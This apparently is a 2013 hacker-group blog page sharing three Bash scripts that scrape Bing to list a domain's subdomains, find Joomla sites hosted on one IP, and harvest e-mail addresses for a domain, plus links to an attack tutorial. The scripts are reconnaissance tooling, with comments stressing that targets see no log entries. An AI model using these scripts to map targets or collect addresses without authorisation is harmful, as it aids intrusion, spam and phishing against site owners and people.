  "          | |       | |                     (_)                                             " \
  " ___ _   _| |__   __| | ___  _ __ ___   __ _ _ _ __    ___  ___ __ _ _ __  _ __   ___ _ __  " \
  "/ __| | | | '_ \ / _\ |/ _ \| '_ \ _ \ / _\ | | '_ \  / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| " \
  "\__ \ |_| | |_) | (_| | (_) | | | | | | (_| | | | | | \__ \ (_| (_| | | | | | | |  __/ |    " \
  "|___/\__,_|_.__/ \__,_|\___/|_| |_| |_|\__,_|_|_| |_| |___/\___\__,_|_| |_|_| |_|\___|_|    " \
  "                                                                                            "
}
# Print the help text of the sub domain scanner.
# Outputs: seven lines on stdout (blank, five banner lines, blank).
# Returns: 0; this Usage does not exit, the caller does.
Usage()
{
printf '%s\n' \
  "" \
  "# ***************************************************************************​****​*********************#" \
  "# Usage      : WebExploiter Sub Domain Scanner <domin>                                               *#" \
  "# Help       : -h && --help : Show This Menu                                                         *#" \
  "# RunScript  : Give Permision to script and run it !!                                                *#" \
  "# ***************************************************************************​****​*********************#" \
  ""
}

# Stop with the help text when no domain was given or help was requested.
# Globals: URL (read)
Check_Arguments()
{
case "$URL" in
  ""|-h|--help)
    Usage
    exit
    ;;
esac
}

# List host names under "$URL" that appear in Bing search result pages.
# Globals: URL (read); domain, url, page, how_many, single_page,
#          last_page_check, check, found_N and loop variables (written)
# Files:   fixed-name scratch files in the current directory
#          (sub_domain_bing.php, alldomain_bing.txt, sub.txt, sub2.txt);
#          the result is written to subdomain.txt, which is overwritten.
# Network: the only host contacted is www.bing.com. Nothing is sent to the
#          domain being looked up, so this run leaves no entry in that
#          domain's own server logs.
# The scraping depends on the result-count markup ("sb_count") and on
# '<h3><a href="' in the result page; if neither is present, how_many is
# empty and the loop ends after the first page.
Sub_Domain()
{

rm -f alldomain_bing.txt;
rm -f sub.txt;
rm -f sub2.txt;


# Reject input that carries a scheme; only "http://" and "Http://" are caught.
if [ `echo "$URL" | egrep  "http://"` ] || [ `echo "$URL" | egrep  "Http://"` ]; 
then
echo -e "\e[1;31m[-] please insert domain with out http:// \e[0m" 
 exit 1
fi

# Strip "www." from the input. The dot is a regex wildcard in both the
# egrep test and the sed address, and sed removes every occurrence.
if [ `echo "$URL" | egrep  "www."`  ]; 
then
domain=`echo "$URL" |sed '/www./s///g' `
else 
domain=$URL
fi


echo -e "\e[1;31m[*] SubDomain Urls Will be Saved  at subdomain.txt Searching Plz W8...\e[0m" 


# Page through the results until the last page, an empty result count or a
# single-page result is detected.
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do


url="http://www.bing.com/search?q=%27$domain%27&qs=n&pq=%27$domain%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

wget -q -O sub_domain_bing.php "$url"

 # Non-empty when the range shown is "N-M of M", i.e. the last page.
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sub_domain_bing.php`

 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sub_domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sub_domain_bing.php `


 # egrep is given the file name as well, so the piped cat output is unused.
 cat "sub_domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" sub_domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
 rm -f sub_domain_bing.php
 let page=$page+1 
 done

# Reduce each result URL to its lower-cased host part and de-duplicate.
cat alldomain_bing.txt | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq >> sub.txt

# Keep only hosts that match "$domain"; it is used as an unanchored regex,
# so hosts that merely contain the string are kept too.
for var in `cat sub.txt` 
do 
echo "$var" | grep "$domain" >> /dev/null;check=$? 
if [ $check -eq 0 ] 
then 
 echo "$var" >> sub2.txt
fi 
done

cat sub2.txt | sort | uniq > subdomain.txt


# wc prints "<count> subdomain.txt"; sed strips the file name.
found_N=`wc -l subdomain.txt | sed 's/subdomain.txt//'` 
echo -e "\e[1;34m[+] Found $found_N SubDomain :) \e[0m" 


for catvar in `cat subdomain.txt`
do
echo -e "\e[1;32m[*] $catvar \e[0m"   
done 

rm -f alldomain_bing.txt;
rm -f sub.txt;
rm -f sub2.txt;
}

# Entry point: show the title, validate the argument, then run the lookup.
main()
{
  banner
  Check_Arguments
  Sub_Domain
}

main

Download : http://www.mediafire.com/download/638lw6ao7zjw7c4/red-viper-sub-dmoain-scannner.sh

Red V!per Server joomla Finder

 

#!/bin/bash
#
# ---------------------------------
# Server joomla Finder  
# Licence : Linux
# ---------------------------------
#
# Title    : Server Joomla Finder 
# Code     : Bash
# Author   : RedH4t.Viper
# Email    : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Released : 2013 04 June
# Thanks   : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew
#
# Gr33tz   : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat | 
# Gr33tz   : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil | 
# Gr33tz   : E2MAEN | (^_^) | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp
# Gr33tz   : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer |  
# Gr33tz   : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous |
# Gr33tz   : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz |
#------------------------------------------------------------------------------------------#

# Script-wide state: page is the result-page index, IP_SERVER the first
# argument; the empty values and how_many drive the result-page loop.
page=0
how_many=1
IP_SERVER=${1}
single_page=""
last_page_check=""

# Print the nine-line ASCII-art title of the Joomla finder.
banner()
{
printf '%s\n' \
  "     _                       _          __ _           _              " \
  "    (_)                     | |        / _(_)         | |             " \
  "     _  ___   ___  _ __ ___ | | __ _  | |_ _ _ __   __| | ___ _ __    " \
  "    | |/ _ \ / _ \| '_ \ _ \| |/ _\ | |  _| | \_ \ / _\ |/ _ \  __|   " \
  "    | | (_) | (_) | | | | | | | (_| | | | | | | | | (_| |  __/ |      " \
  "    | |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|_| |_|\__,_|\___|_|      " \
  "   _/ |                                                               " \
  "  |__/                                                                " \
  "                                                                      "
}

# Print the help text of the Joomla finder.
# Outputs: seven lines on stdout (blank, five banner lines, blank).
# Returns: 0; this Usage does not exit, the caller does.
Usage()
{
printf '%s\n' \
  "" \
  "# ***************************************************************************??****?*********************#" \
  "# Usage      : Server Joomla Finder  <IP/Domain>                                                     *#" \
  "# Help       : -h && --help : Show This Menu                                                         *#" \
  "# RunScript  : Give Permision to script and run it !!                                                *#" \
  "# ***************************************************************************??****?*********************#" \
  ""
}

# Stop with the help text when no IP/domain was given or help was requested.
# Globals: IP_SERVER (read)
Check_Arguments()
{
case "$IP_SERVER" in
  ""|-h|--help)
    Usage
    exit
    ;;
esac
}

# List sites on one IP address whose indexed URLs contain
# "index.php?option=com_", using Bing's "ip:" search operator.
# Globals: IP_SERVER (read); IP, url, page, how_many, single_page,
#          last_page_check, check, found_N and loop variables (written)
# Files:   fixed-name scratch files in the current directory
#          (domain_bing.php, alldomain_bing.txt, domains.txt,
#          IndexDomain.txt); results are appended to finded.txt, which is
#          never truncated, so earlier runs accumulate in it.
# Network: the only host contacted is www.bing.com (plus name resolution
#          through resolveip); the listed sites themselves receive no
#          request from this function.
Searching_Jce()
{
 rm -rf domains.txt
 rm -rf alldomain_bing.txt
 rm -rf IndexDomain.txt

  # The pattern is unanchored: any argument containing a dotted quad or a
  # bracketed hex/colon group is taken as an IP without further validation.
  if [ `echo "$IP_SERVER" | egrep  "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"`  ]; then
    IP="$IP_SERVER"
   else
     IP=`resolveip -s "$IP_SERVER"`
      if [ "$?" != 0 ]; then
       echo -e "[-] Error: cannot resolve $IP_SERVER to an IP " 
        # NOTE(review): Check_Back is not defined anywhere in this listing;
        # if it is missing at run time the call fails and execution goes on
        # with an empty IP.
        Check_Back
      fi
    fi

echo -e "\e[1;35m[*] Finded Joomla Web Sites Will be Save at finded.txt \e[0m"
echo -e "\e[1;35m[*] Searching Joomla Web Sites on $IP Plz W8 \e[0m"


touch  alldomain_bing.txt;

 # Page through the results until the last page, an empty result count or
 # a single-page result is detected.
 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

 url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"


 wget -q -O domain_bing.php "$url"


 # Non-empty when the range shown is "N-M of M", i.e. the last page.
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

#  check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `


 # egrep is given the file name as well, so the piped cat output is unused.
 cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
 rm -f domain_bing.php
 let page=$page+1 
 done


 # Strip the scheme and "www." (dot is a regex wildcard), lower-case,
 # de-duplicate.
 cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt


  # Keep only result URLs that contain "com_".
  for domain in `cat domains.txt`
   do
    echo "$domain" | grep "com_" >> /dev/null;check=$?
               if [ $check -eq 0 ]
                    then
                   echo "$domain" >>IndexDomain.txt
               fi
    done

# Drop the query string and the "index.php" part to get the site base path.
cat IndexDomain.txt | cut -d '?' -f 1 | awk '{gsub("index.php","")}1' | sort | uniq >> finded.txt

# wc prints "<count> finded.txt"; sed strips the file name.
found_N=`wc -l finded.txt | sed 's/finded.txt//'` 
echo -e "\e[1;34m[+] Found $found_N :) \e[0m" 


for joom in `cat finded.txt`
do
echo -e "\e[1;32m[*] $joom \e[0m"   
done 

rm -rf domains.txt
rm -rf alldomain_bing.txt
rm -rf IndexDomain.txt
}

# Entry point: show the title, validate the argument, then run the search.
main()
{
  banner
  Check_Arguments
  Searching_Jce
}

main

Download : http://www.mediafire.com/download/mtpy84d7lp0byol/red-viper-joomla-finder.sh

Red V!per Email Collector Bash Script

#!/bin/bash
#
# ---------------------------------
# TBH && IrIsT EMail Collector 
# Licence : Linux
# ---------------------------------
#
# Title   : TBH && IrIsT EMail Collector
# Code    : Bash
# Author  : RedH4t.Viper
# Email   : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com
# Date    : 2013 09 May
# Thanks  : IrIsT ,TBH ,kurdhackteam , 3xp1r3
#
# Gr33tz  : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Net.W0lf |
# Gr33tz  : Skote_Vahshat| Dj.TiniVini| Mr.XHat | Black King |
# Gr33tz  : E2MAEN | Mr.F@RDIN | M4st3r4N0nY | ICA_r00t | m3hdi |
# Gr33tz  : x3o-1337 | rEd X | No PM  | Gabby | Sukhoi Su-37
# Gr33tz  : ARTA | H-SK33PY | (^_^) | Turk Sever | And All Of IrIsT Memebrz
#------------------------------------------------------------------------------------------#
# Script-wide state: page is the result-page index, Domain the first
# argument; the empty values and how_many drive the result-page loop.
page=0
last_page_check=""
how_many=1
single_page=""
Domain=${1}

# Print the help text of the e-mail collector.
# Outputs: seven lines on stdout (blank, five banner lines, blank).
# Returns: 0; this Usage does not exit, the caller does.
Usage()
{
 printf '%s\n' \
   "" \
   "# ****************************************************************************************************#" \
   "# Usage      : TBH EMail Collector <domain>                                                          *#" \
   "# Help       : -h && --help : Show This Menu                                                         *#" \
   "# RunScript  : Give Permision to script and run it !!                                                *#" \
   "# ****************************************************************************************************#" \
   ""
}

# Main flow of the e-mail collector: validate the argument, page through
# Bing results for "@$Domain", extract the local parts of addresses that
# Bing shows with the domain highlighted, then print and store them.
# Files:   fixed-name scratch files in the current directory (page.php,
#          mails.lst, nmail.lst); results are appended to Collected.lst,
#          which is never truncated, so earlier runs accumulate in it.
# Network: the only host contacted is www.bing.com. Nothing is sent to the
#          domain being searched, so the run leaves no entry in that
#          domain's own mail or web logs; it only reflects addresses that
#          are already publicly indexed.
# check for arguments
if [ -z "$Domain" ] || [ "$Domain" == "-h" ] || [ "$Domain" == "--help" ]; then
Usage;
exit
fi

 # Page through the results until the last page, an empty result count or
 # a single-page result is detected.
 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

 url="http://www.bing.com/search?q=%27%40$Domain%27&qs=n&pq=%27%40$Domain%27&sc=0-0&sp=-1&sk=&first=${page}1&FORM=PERE7"

 wget -q -O page.php "$url"


 # Non-empty when the range shown is "N-M of M", i.e. the last page.
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' page.php`

# if no results are found, how_many is empty and the loop will exit
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' page.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

#  check for a single page of results
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' page.php`

 # "$Domain" is placed into the pattern unescaped, so its dots act as
 # regex wildcards.
 cat page.php | egrep -o "[-A-Za-z0-9_.]+<strong>@$Domain</strong>" | tr '[:upper:]' '[:lower:]' | sort | uniq>>mails.lst

 rm -f page.php
 let page=$page+1
 done

# Keep only the part before "<", i.e. the local part of each address.
cat mails.lst | cut -d '<' -f 1 | tr '[:upper:]' '[:lower:]' | sort | uniq >> nmail.lst

# wc prints "<count> nmail.lst"; sed strips the file name.
found_N=`wc -l nmail.lst | sed 's/nmail.lst//'`
echo -e "\e[1;34m [+] $found_N Email Collocted :) \e[0m"

for ec in `cat nmail.lst`
do
echo "[*] $ec@$Domain" >> Collected.lst  
done


for ec in `cat nmail.lst`
do
echo -e "\e[1;32m[*] $ec@$Domain \e[0m"  
done

rm -rf mails.lst
rm -rf nmail.lst  


Download : http://www.mediafire.com/view/9962o54dqx820ow/redviper-email-collector.sh

Friday, July 19, 2013

How to Attack on Remote PC With Applications Vulnerabilities





Back Track Tutorials 

Article Name : How to Attack on Remote PC With Applications Vulnerabilities
language : English
Page # : 56

Download : www.mediafire.com/?809b6bu3txi2v1a